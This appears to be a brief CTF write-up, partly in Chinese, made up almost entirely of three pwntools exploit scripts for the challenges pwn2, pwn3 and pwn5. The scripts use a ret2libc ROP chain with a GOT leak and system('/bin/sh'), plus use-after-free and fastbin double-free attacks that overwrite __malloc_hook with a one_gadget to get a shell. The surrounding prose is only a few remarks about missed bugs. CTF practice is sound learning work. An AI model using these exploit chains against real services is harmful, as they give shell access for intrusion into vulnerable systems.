pwn2

题目&&分析

ret2libc

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python2
#coding = utf8

import sys
from pwn import *

context.log_level = 'debug'
#context.terminal = ['gnome-terminal','-x','bash','-c']

if len(sys.argv) > 1:
	local = 0
else:
	local = 1

if local:
	sh = process('Emachine')
	elf = ELF('Emachine')
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
	sh = remote('172.29.32.110','8888')
	elf = ELF('Emachine')
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')


def en(enc):
	s = []
	res = 0
	for i in range(8):
		sk = enc % 0x100
		enc = (enc - sk)/0x100 
		s.append(sk)
		
	for x in s:
		if x>47 and x <57:
			x ^= 0xf
		elif x<= 64 and x >90:
			x ^= 0xe
		elif x<=96 and x>122:
			x ^= 0xd
		res = x + res*0x100
	print s
	return res

pop_rdi = 0x0000000000400c83
#main = 0x400b28
start = 0x400790
sh.sendlineafter("Input your choice!\n",'1')
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.symbols['puts'])+p64(start)
sh.sendline(pay)
sh.recvuntil('oooooooo')
sh.recvuntil('\n')
leak = u64(sh.recvuntil('\n',drop=True).ljust(8,'\x00'))
#print hex(e)
#leak =en(e)
print hex(leak)
system = leak - libc.symbols['puts'] +libc.symbols['system']
#environ = leak - libc.symbols['puts'] +libc.symbols['environ']
read = leak - libc.symbols['puts'] +libc.symbols['read']
print hex(system)
print hex(read)
#gdb.attach(sh)
sh.recv()
sh.sendline('1')
pop_rsi_r15 = 0x0000000000400c81
#pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(0x602080)+p64(0)+p64(read)+p64(start)
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0x6020a8)+p64(elf.symbols['gets'])+p64(start)
sh.sendline(pay)
sh.sendline('/bin/sh\x00')

sh.recv()
sh.sendline('1')
#gdb.attach(sh)
pay = 'a'*0x50+'bbbbbbbb'+p64(pop_rdi)+p64(0x6020a8)+p64(system)+p64(start)
sh.send(pay)


sh.interactive()

pwn3

当时没看,血亏。

题目&&分析

溢出+uaf漏洞

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python2
#coding = utf8

import sys
from pwn import *

context.log_level = 'debug'
#context.terminal = ['gnome-terminal','-x','bash','-c']

if len(sys.argv) > 1:
	local = 0
else:
	local = 1

if local:
	sh = process('./pwn')
	elf = ELF('./pwn')
	libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
	sh = remote('','')
	elf = ELF('pwn')
	libc = ELF('libc.so.6')


def create(size,name):
    sh.sendlineafter("Command: \n","1")
    sh.sendlineafter("size: \n",str(size))
    sh.sendafter("name: \n",name)


def show(index):
    sh.sendlineafter("Command: \n",'2')
    sh.sendlineafter('index: \n',str(index))

def dele(index):
    sh.sendlineafter("Command: \n",'3')
    sh.sendlineafter('weapon:\n',str(index))


def backdoor(index):
    sh.sendlineafter("Command: \n",'666')
    sh.sendlineafter("weapon:\n",str(index))


create(0x100,'a\n')
create(0x60,'b\n')
create(0x60,'c\n')
create(0x60,'a'*0x10+p64(0x110)+p64(0x41)+'\n')
dele(0)
show(0)
sh.recvuntil("attack_times: ")
libc.base = int(sh.recvuntil("\n",drop=True))-0x3c4b78
print hex(libc.base)
malloc_hook = libc.base+libc.symbols['__malloc_hook']#0x3c4b00
print hex(malloc_hook)
one_gadget = libc.base+0xf02a4#0x4526a

create(0x100,'a'*0xf0+p64(0x110)+p64(0x111))
dele(2)
dele(1)
create(0x100,'a'*0x58+p64(0x71)+p64(malloc_hook-0x23)+'\n')
create(0x60,'b\n')
create(0x60,'aaa'+p64(one_gadget)+'\n')
#dele(7)
#create(0x4f,'\n')

#gdb.attach(sh)
sh.interactive()

pwn5

没注意到一个煞笔漏洞,被忽悠的以为有size检测,把好好的一道送分题送了

题目&&分析

开局可以泄露libc地址,本来用的是fmt,结果可以直接泄露。之后uaf

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *


sh = process("./pwn")
#sh = remote("172.29.21.114", 8888)
# todo check libc version
libc = ELF("libc-2.23.so", checksec = False)


sh.sendafter("name?","a"*7+"b")
sh.recvuntil("ab")
addr = u64(sh.recv(6) +"\x00"*2)-0x6fdbd
print(hex(addr))
sh.sendlineafter("ID.","123")

def add(size, content):
    sh.sendlineafter("choice:", "1")
    sh.sendlineafter("story:",str(size))
    sh.sendafter("story", content)

def remove(index):
    sh.sendlineafter("choice:","4")
    sh.sendlineafter("dex:",str(index))



add(0x68, "123")
add(0x68, "123")
remove(0)
remove(1)
remove(0)

add(0x68, p64(addr+libc.symbols["__malloc_hook"]-35))
add(0x68,"aaa")
add(0x68,"bbb")
add(0x68,"a"*19+p64(addr+0xf1147))#0xf02a4))

#add(0x10,'a')
#remove(0)
#remove(0)
gdb.attach(p)
sh.interactive()